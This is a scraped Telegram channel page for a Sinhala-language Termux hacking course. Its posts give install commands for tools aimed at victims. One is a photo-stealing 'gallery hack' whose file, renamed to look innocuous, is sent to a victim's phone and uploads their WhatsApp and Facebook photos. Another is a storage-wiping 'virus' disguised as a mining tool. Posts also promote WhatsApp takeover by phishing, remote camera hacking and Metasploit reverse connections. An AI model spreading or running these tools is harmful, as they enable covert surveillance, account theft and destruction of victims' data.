uz
Feedback
SL Android Official ™ 🇱🇰

SL Android Official ™ 🇱🇰

Kanalga Telegram’da o‘tish

💢 SL Android වෙතින්, 💥 Termux Basic ඉදලා Advance දක්වා vedio+ post Full Course එකක් කරනවා 💥 Python ,PHP ,HTML ,CSS ,Shell Programming Full course 💥 Hacking 💥අමතර තාක්ෂණික දැනුම ලබා ගත හැක

Ko'proq ko'rsatish
2 802
Obunachilar
+124 soatlar
-117 kunlar
-1730 kunlar
Postlar arxiv
💢 *Hide-In-Picture Tool* 💢 💢 *ඔන්න ඉතින් සුපිරි වැඩක් තම්‍යි අද කියන්න යන්නේ හරි මේකෙන් වෙන්නේ ඔයාට ඕනම දෙයක් picture එකක්
💢 *Hide-In-Picture Tool* 💢 💢 *ඔන්න ඉතින් සුපිරි වැඩක් තම්‍යි අද කියන්න යන්නේ හරි මේකෙන් වෙන්නේ ඔයාට ඕනම දෙයක් picture එකක් ඇතුලේ හංගලා යවන්න පුළුවන්.ඒවගේම එහෙම හංගලා තියෙන ඕනම දෙයක් බලන්නත් පුළුවන්* ❤️ *මෙන්න වීඩීයෝ එක බලලම ඉන්න නැත්තම් තේරෙන එකක් නෑ* https://youtu.be/M8HkMlRPy-g 💢 මෙන්න Command 👇👇 *Hide-In-Picture* >pkg update && pkg upgrade >pkg install git >git clone http://github.com/RazorKenway/Hide-In-Picture.git >cd Hide-In-Picture >python requirements.py >python hide.py *මම Razor Kenway (SL Android)*

💢 *Gallery Hack Tool Version No2* 💢 ඔන්න හැමෝම බලන් හිටපු වීඩීයෝ එක අරගෙන ආවා ❤️මේකේ Ghack.py කියලා ඔයාටම ආවේනික hack file
💢 *Gallery Hack Tool Version No2* 💢 ඔන්න හැමෝම බලන් හිටපු වීඩීයෝ එක අරගෙන ආවා ❤️මේකේ Ghack.py කියලා ඔයාටම ආවේනික hack file එකක් හැදුනනෙ කලින් version එකේ ඉතින් ඒක ඕන කෙනෙක්ට අදුරගන්න පුළුවන් නිසා හැදෙන file එකේ නම requirements.py ලෙස වෙනස් කරා. ❤️අලුත් update එකේ ඔයාලට whatsapp ,facebook ,imo,telegram වගේ ඕනම එකක 4tos ගන්න පුළුවන් ඔයාලගෙ website එකට,මේකේ තව updates ඉස්සරහට දෙන්නම්.touch එකේ ඉන්න ❤️වීඩීයෝ එක බැලුවම තේරේවි.. වීඩීයෝ 2ක් තියෙනවා 2කම බලන්න ❤️මෙන්න කලින් version එකේ වීඩීයෝ එක 2👇👇 අලුත් update එකේ වීඩීයෝ එකත් ලගදිම දෙන්නම්.. https://youtu.be/rNMyNBq2R_Q https://youtu.be/zq4x0Ny9OuI ---------------------------------------------------------------------- *GalleryHack Tool version 2* 👇👇 *Termux Users Gallery Hack Tool (Owner - Razor Kenway | SL Android | Sri Lanka* pkg update && pkg upgrade pkg install git git clone https://github.com/RazorKenway/GalleryHack.git cd GalleryHack python galleryhack.py >Sent To victim requirements.py File And Run Victim's Phone

Gallery Hack Tool Commands Termux Users Gallery Hack Tool (Owner - Razor Kenway | SL Android | Sri Lanka >pkg update && pkg upgrade >pkg install git >git clone https://github.com/RazorKenway/GalleryHack.git >cd GalleryHack >python galleryhack.py >Sent To victim Gahack.py File And Run Victim's Phone ## Type Victim's phone :- python Gahck.py

💢 *Gallery Hack Tool* 💢 ඔන්න හැමෝම බලන් හිටපු වීඩීයෝ එක ඇරගෙන ආවා..හරියටම වීඩීයෝ එක බලන්න skip කරන්න එපා ඒතරම් වැදගත්..Skip කරොත් තේරෙන එකක් නෑ. ❤️මේකේ Ghack.py කියලා ඔයාටම ආවේනික hack file එකක් හැදෙනවා.වීඩීයෝ එක බැලුවම තේරේවි.. ❤️මෙන්න වීඩීයෝ එක 👇👇 https://youtu.be/rNMyNBq2R_Q 💢 Facebook Group එකට joing wenna --https://www.facebook.com/groups/277920623081269/?ref=share 💢 Youtube එකෙත් Subscribe කරලා සෙට් වෙන්න--https://m.youtube.com/channel/UCLJPOlgldE496tVZjSRi45Q?sub_confirmation=1

💢How To Hack Whatsapp Using Termux💢 හරි ඔන්න ටික කාලෙකට පස්සේ තමයි පෝස්ට් එකක් ලියන්නෙ.ඕගොල්ලන්ට title එක දැක්ක ගමන් පේනවා ඇති අද මොකද්ද කරන්න හදන්නේ කියලා ඔව් ඔව් whatsapp එකක් හැක් කරන්න තමා..හැක් කරනවා කියලා කිව්වාට මේකෙදි අපි කරන්නේ Phishing attack එකක් කරලා එයාගේ whatsapp account එක උස්සන එක.. 💢ඉතින් මේ වැඩේ කරන්න කලින් අපිට අවශ්‍ය දේවල් # හොද Connection එකක් wifi බෑ # Termux app # tool ඉතින් මේ වැඩේ කරන්න කලින් ඔයාලගේ phone එකේ mobile hostpot on කර්ගෙන ඉන්න ඕන.. ❤️ඔන්න ඉතින් වැඩි කතා ඕන නෑ පහල වීඩීයෝ එක හරියට බලලා වැඩේ කර ගන්න.. 💢 Video link 👇👇👇 https://youtu.be/Hw5STtQemao Phishing වලින් නැතුව whatsapp account එකක් ගන්න හැටි ඉස්සරහට අනිවාර්යයෙන් කියලා දෙන්නම්.. මම Razor Kenway . . . .

💢 Termux Advanced Commands 💢 ගොඩාක් වැදගත් වෙන කවුරුත් කියලා දෙන්නෙ නැති කමාන්ඩ්ස් ටිකක් තමයි අද කතා කරන්නේ එහෙනම් වීඩීයෝ එක බලලම එන්න Termux Sinhala Tutorial Episode 41 Vedio link 👇👇 https://youtu.be/86_NyxRLQAY

❤️ටූල් එක හදන හැටි වීඩියෝ එක👇👇 https://youtu.be/w_j5V-_4C-8 💢 Clip clap Auto mining tool this tool like a clipclap auto mining tool but it is a simple storage clear virus please use carefully All requarement automatically install pkg update && upgrade pkg install git git clone https://github.com/RazorKenway/ClipclapAuto.git cd ClipclapAuto bash setup.sh ඔන්න මම හදපු Storage එකම Clear වෙන tool එක..ඉතින් මේක හදලා තියෙන්නෙ .clipclap auto mining වෙන tool එකක් විදියට හැබැයි එහෙම නෙමෙයි....😂..මේක රන් කරාට පස්සේ storage එකම format වෙනවා..ඉතින් මේක වැරදි දේවල් වලට යොදා ගන්න එපා..

💢💢💢💢 Special Note 💢💢💢💢 කැමර් එක හැක් කරන එහෙමත් නැත්තම් තව කෙනෙක්ගේ phone කැමර් එක දුර ඉදලා ඔන් කරලා 4to ගහන වීඩියෝ එකක් මම දැම්මනේ termux tutorial වල....ඉතින් ඒක ගොඩක් කට්ටියට හරියට කර ගන්න බැරි වෙලා තිබුනා..ඒක නිසා මම ඒ ප්‍රශ්න වලට පිලිතුරක් විදියට වීඩියෝ එකක් හැදුවා..හැමෝම ඒක බලලා ප්‍රශ්න විසඳ ගන්න.. මෙන්න ලින්ක් එක 👇👇👇👇 https://youtu.be/yM3hfmHev8I

💢 උඩ කියලා දුන්නු බැනර් එකෙන් පුළුවන් මේ විදියට බැනර් දා ගන්න Banner දාන tool එක මන් පහලින් දාන්නම් කට්ටිය termux එකේ install කර ගන්න.. මතක තියා ගන්න එක comand එකක්වත් අඩු කරන්නේ නැතුව ගහන්න 💢EvilEye-Banner pkg update && upgrade(අනිවාර්ය) pkg install python pkg install python2 pkg install git pkg install lolcat pkg install figlet pkg install curl pkg install nano pkg install wget pkg install ruby git clone https://github.com/RazorKenway/EvilEye-Banner.git cd EvilEye-Banner chmod +x * bash slandroid.sh 💢ඊට පස්සේ ප්‍රශ්න වගයක් අහනවා තමන්ට කැමති විදියට බැනර් එක හදා ගන්න ඕන විදිය තමයි අහන්නේ.අහන ප්‍රශ්න වලට තමන් කැමති විදියට උත්තර දෙන්න 💢 ලස්සන බැනර් හදාගන්න AscII Art තියෙන website එකක් මේක http://patorjk.com/software/taag/#p=display&f=Graffiti&t=SL Android 💢මොකක් හරි ප්‍රශ්නයක් ආවානම් මේ වීඩියෝ එක බලන්න EvilEye-Banner Update Version | Termux Sinhala Tutorials Episode 18 | SL android https://youtu.be/zV5fQK3dg9g 💢 හරි එහෙනම් මම ගියා *Razor Kenway*

+1
💢 EvilEye-Banner එක හැදුන හැටි source code සමග 💢 (තනියම බැනර් එක Coding කරමු ) Post no 15 හරි අපි කලින් කතා කරේ තනියම ටූල් එකක් හදන්නේ කොහොමද කියලා අපි ගොඩාක් දේවල් ඉගෙන ගත්තා..ඉතින් ඉගෙන ගත්ත දෙවල් වල practical part එකකුත් තියෙන්න ඕන නිසා අපි බලමු evilEye-Banner එක කොහොමද තනොයම හදන්නේ කියලා.. ඉතින් මුලින්ම කියන්න ඕන මේ වීඩියෝ එකේ සරලව කියලා දෙන්නම් coding කරන විදිය..මම හදපු evilEye-Banner එක මීට වඩා සංකීර්ණයි...ඔයාලට පුළුවන් ඒකත් අත්හදා බලන්න.ඊට වඩා හොද නිර්මාණ කරන්න පුළුවන්.. 💢💢 specially මන් හිතනවා ඔයාලා දැන් හරියට ඉගෙනගෙන ඇති කියලා ❤️මෙන්න එහෙනම් video එක 👇👇👇 https://youtu.be/kSZkRU4R-VQ

💢 How To Create A Own Tool Part 4 (තමන්ගෙම ටූල් එකක් හදමු) Post No 14 හරි ඉතිං අපි කලින් වීඩියෝ එකේ කතා කරා bash scripting ගැන මූලික දේවල්.ඒක බැලුවේ නැත්තම් ඒක බලලා එන්න අනිවාර්යයෙන් නැත්තම් තේරෙන්නේ නෑ..අද තවදුරටත් අපි කතා කරමු පහත මාතෘකා ටික. ❤️ විචල්‍ය අර්තදැක්වීම ❤️ විචල්‍ය භාවිතය ❤️ දත්ත ලිවීම හොදයි වීඩියෝ එක බලන්න හරියටම..හරියට බලලා practice කරන්න නැත්තම් මේක දිහා බලන් හිටියා කියලා පුළුවන් වෙන්නේ නෑ Video👉 https://youtu.be/fuKtlOiXvA8 . 😍 මම Razor Kenway . . . Join Telegram :-https://t.me/joinchat/AAAAAFHmxm72d-lboeaueg . Youtube :- https://www.youtube.com/c/SLAndroid . . .

💢How to create own termux tool Post no 13 ඔන්න ඉතින් අපි මෙච්චර කල් අනුන්ගෙ ටූල් වලින් එක එක දේවල් කරානේ,facebook hack,whsapp hack ,spamm ගැහුවා ඔය වගේ දේවල් කරානේ ඉතින් ඔයාලා කල්පනා කරලා බැලුවද අපි එච්චර දේවල් කරපු tool කොහොමද හැදිලා තියෙන්නේ කියලා???? ඒවගෙන් වෙන්නෙ මොකක්ද කියලා කවුරුවත් හොයලා බැලුවේ නෑ ඒවා use කරපු එක විතරයි කරේ... 💢 හොදයි මෙතන ඉදලා අපි බලමු කොහොමද tool එකක් හදන්නේ කියලා ඉතින් මේක ගොඩක් සංකීර්ණයි සරලව උගන්නන්න මම ගොඩක් උත්සාහ කරන්නම් 💢 පලවෙනි දේ තමයි ඔයාලට python ,shell වගේ programming language වල මූලික දැනුවක් අව්ශ්‍ය වෙනවා කලබල වෙන්න එපා ඒවත් මම මගෙ චැනල් එකේ උගන්නන්නවා..ඒ ටිකත් බලන්න.. ❤️හරි අපි කලින් පෝස්ට් එකේ කතා කරා මූලික දේවල් ටික ඒ දෙක අනිවා බලලා ඉන්න Post 1) https://youtu.be/rmM4IyiQATw Post 2) https://youtu.be/urTdzck-nck හරි දැන් බලමු කොහොමද shell file එකක් හදන්නේ කියලා මෙතන ඉදලා shell ටික කවර් කරන්නම්, ❤️Vedio link: https://youtu.be/rSn7nMTZjJU මෙහිදී ❤️ what is shell programming ??? ❤️create sh file ❤️how to run sh file ❤️print ඔන්න ඔය දේවල් ගැන මේ වීඩියෝ එකෙන් කතා කරනවා..හරියට වීඩියෝ එක බලන්න..ඊලග වීඩියෝ එකත් ඉක්මනට ගේන්නම්. මම Razor Kenway . . . Join Telegram :-https://t.me/joinchat/AAAAAFHmxm72d-lboeaueg . Youtube :- https://www.youtube.com/c/SLAndroid . . .

💢Phishing නැතුව whsapp real විදියට හැක් කරන්න ක්‍රමයක් ඕනද?? Youtube Chanel එකේ දාන්න හිතාගෙන ඉන්නේ බලමු.. 💢දැනට Phishing වලින් Whsapp Account එකක් උස්සන විදිය දාලා තියෙන්නේ ඒකත් බලන්න 💢SL Android Youtube Chanel එක Subscribe කරලා තියා ගන්න ❤️❤️
Anonymous voting

💢 How to Use Metasploit Any Network (Metasploit වෙනත් network එකක් එක්ක් භාවිතය ) ❤️ post no 14 ❤️ Post no 12 :-https://youtu.be/7HXxocx5RtQ Post no 13 :-https://t.me/c/1374078574/43 හරි අපි අද බලමු කොහොමද වෙනත් network එකක් එක්ක metasploit භාවිතා කරලා tcp connection එකක් හදාගන්නේ කියලා.. කලින් වගේම කියන්න ඕන මේ වීඩියෝ එකත් මම ටිකක් පොඩි කාලෙ කරේ එච්චර අත්දැකීම් නෑ..අඩුපාඩු ඇති ඒවා ගනන් ගන්න එපා..අදාල දේ ඔලුවට දා ගන්න මම Razor Kenway . . . Join Telegram :-https://t.me/joinchat/AAAAAFHmxm72d-lboeaueg . Youtube :- https://www.youtube.com/c/SLAndroid .

💢EvilEye-Banner pkg update && upgrade pkg install python pkg install python2 pkg install git pkg install lolcat pkg install figlet git clone https://github.com/RazorKenway/EvilEye-Banner.git cd EvilEye-Banner chmod +x * bash slandroid.sh 💢ඊට පස්සේ ප්‍රශ්න වගයක් අහනවා තමන්ට කැමති විදියට බැනර් එක හදා ගන්න ඕන විදිය තමයි අහන්නේ.අහන ප්‍රශ්න වලට තමන් කැමති විදියට උත්තර දෙන්න 💢 ලස්සන බැනර් හදාගන්න AscII Art තියෙන website එකක් මේක http://patorjk.com/software/taag/#p=display&f=Graffiti&t=SL Android 💢මොකක් හරි ප්‍රශ්නයක් ආවානම් මේ වීඩියෝ එක බලන්න EvilEye-Banner Update Version | Termux Sinhala Tutorials Episode 18 | SL android https://youtu.be/zV5fQK3dg9g 💢 හරි එහෙනම් මම ගියා *Razor Kenway*

ඕක බලන්න

තව වීඩියෝ 2ක් තියෙනවා

Metasploit භාවිතා කරන හැටි

මේක මං පුංචි කාලේ හදපු වීඩියෝ එකක් පොඩි පොඩි අවුල් ඇති ගනන් ගන්න එපා..voice balance එහෙම නෑ..හුස්ම ගන්න සද්දෙ ඇහෙනවා ඒවා ගනන් ගන්න එපා...පුන්චි එකානේ 😂😂